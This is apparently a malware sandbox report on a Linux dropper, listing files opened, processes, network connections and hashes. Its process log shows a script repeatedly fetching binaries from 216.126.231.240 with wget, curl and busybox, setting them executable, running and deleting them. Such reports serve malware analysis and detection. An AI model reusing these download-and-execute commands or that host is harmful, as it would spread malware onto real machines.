| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
Processes
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/chmod
[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/rm
[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/wget
[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/chmod
[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/rm
[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/wget
[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/chmod
[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/rm
[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/wget
[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/chmod
[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/rm
[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/wget
[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/chmod
[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/rm
[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/wget
[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/chmod
[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/rm
[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/wget
[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/chmod
[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/rm
[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/wget
[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/chmod
[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/rm
[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/wget
[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/chmod
[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/rm
[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/wget
[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/chmod
[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/rm
[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/wget
[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/chmod
[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/rm
[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/wget
[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/chmod
[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/rm
[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/chmod
[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/rm
[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/chmod
[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/rm
[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/wget
[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/chmod
[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/rm
[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/wget
[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/804-1-0xb6784000-0xb6795044-memory.dmp
memory/830-2-0xb674f000-0xb6760044-memory.dmp
memory/850-3-0xb673b000-0xb674c044-memory.dmp